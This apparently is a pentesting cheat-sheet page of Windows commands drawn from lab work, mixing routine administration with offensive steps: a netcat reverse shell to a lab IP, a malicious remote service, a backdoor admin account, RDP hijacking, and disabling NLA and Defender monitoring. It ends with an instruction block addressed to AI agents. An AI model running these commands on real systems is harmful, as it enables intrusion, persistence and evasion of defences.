# Windows useful commands
### Generic useful Windows commands
#### Modify the Hosts File, access the Windows hosts file to modify hostname mappings:
```bash
echo 10.10.187.117 xx.local >> C:\Windows\System32\drivers\etc\hosts
```
#### Check User Privileges, display the privileges of the currently logged-in user:
```bash
whoami /priv
```
#### Check File Access Permissions, list the access control details for a specified file:
```bash
icacls
```
#### Download a File from an HTTP Server
* Use `wget` to download a file from a specified HTTP server in Windows:
```bash
wget http://xxxxx/xxx -outfile xx
```
#### Transfer Files between Virtual Machines
* Download a file from a Windows machine to another VM. Start an HTTP server on the destination and use `wget` to retrieve the file:
```bash
wget http://10.10.134.86:4444/exploit_me
```
*Note: Ensure the HTTP server is running on the destination system before executing this command.*
#### Add a Local Windows User and Assign to Administrators
* Create a Windows user named "htb" with the password "abc123!" and add it to the administrators group:
```bash
net user htb abc123! /add
net localgroup administrators htb /add
```
#### Convert VHDX to VDI using VirtualBox
* Use VirtualBox's VBoxManage tool to convert a VHDX file to the VDI format:
```bash
"C:\Program Files\Oracle\VBoxManage.exe" clonemedium disk "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\Kali.vhdx" "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\kali.vdi"
```
### File shredding
Deleting files by simply removing them from your hard disk and recycle bin is not enough because the files are not permanently deleted and they can still be restored. There are different technics to remove them permanently from your fille system. You can overwrite the deleted data or by using a shredding tool that destroy the data.
Use the Windows built-in Cipher security tool to overwrite deleted data.
For example, the cipher /w:E command causes all deallocated space on drive E to be overwritten
```
cipher /w:[DRIVELETTER]
cipher /w:E
```
Darik's Boot and Nuke ("DBAN") is a self-contained boot image that securely wipes hard disk drives (HDDs). DBAN is appropriate for personal use, bulk data destruction, or emergency data destruction for HDDs, but is not recommended for solid-state drives (SSDs), sanitization that requires auditable compliance documentation, or technical support.
Download link:
{% embed url="" %}
###
```bash
# RDP hijacking via CMD
# Example: Take over a disconnected session
Query system
tscon 3 /dest:rdp-tcp
```
### Other Powershell useful command's
Find a keyword in a directory content
ls fatty-client\ -recurse | Select-String "8000" | Select Path, LineNumber | Format-List
# Find .txt files in the current directory using PowerShell
Get-ChildItem *.txt
# Retrieve information on a specific package via PowerShell
Get-WmiObject -Class Win32_Product | Where-Object Name -Match TOSHIBA | Format-Table
# Get package info using Get-Package in PowerShell
Get-Package *TOSHIBA*
# Enable Remote Desktop Protocol via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
# Allow Remote Desktop through Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Add a user to the Remote Desktop Users group
Add-LocalGroupMember -Group "Remote Desktop Users" -Member "username"
# Change the administrator's password via CMD
net user USERNAME PASSWORD
# Disable Network Level Authentication to allow RDP
$TargetServer = "SCADA-SLAVE" (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetServer -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
# Disable NTLM to permit RDP - registry command
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
# Enable RDP via command line alongside firewall settings
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Disable real-time monitoring of antivirus through PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true
#get help with a powerhsll module
get help
Get-Help Get-Process
# If you want more detailed information, including examples, use:
Get-Help Get-Process -Detailed
# For the most comprehensive help, including parameter descriptions, use:
Get-Help Get-Process -Full
#And if you’re looking for examples specifically, try:
Get-Help Get-Process -Examples
### Create malicious service
```bash
# Get a reverse shell from Windows using netcat
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.46.122 4443"
# Create and start a malicious service for a reverse shell
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com create LOLIservice-3249 binPath= "%windir%\bad.exe" start= auto"
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com start LOLIservice-3249"
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://docs.hackjiji.org/windows-pentesting/windows-useful-commands.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.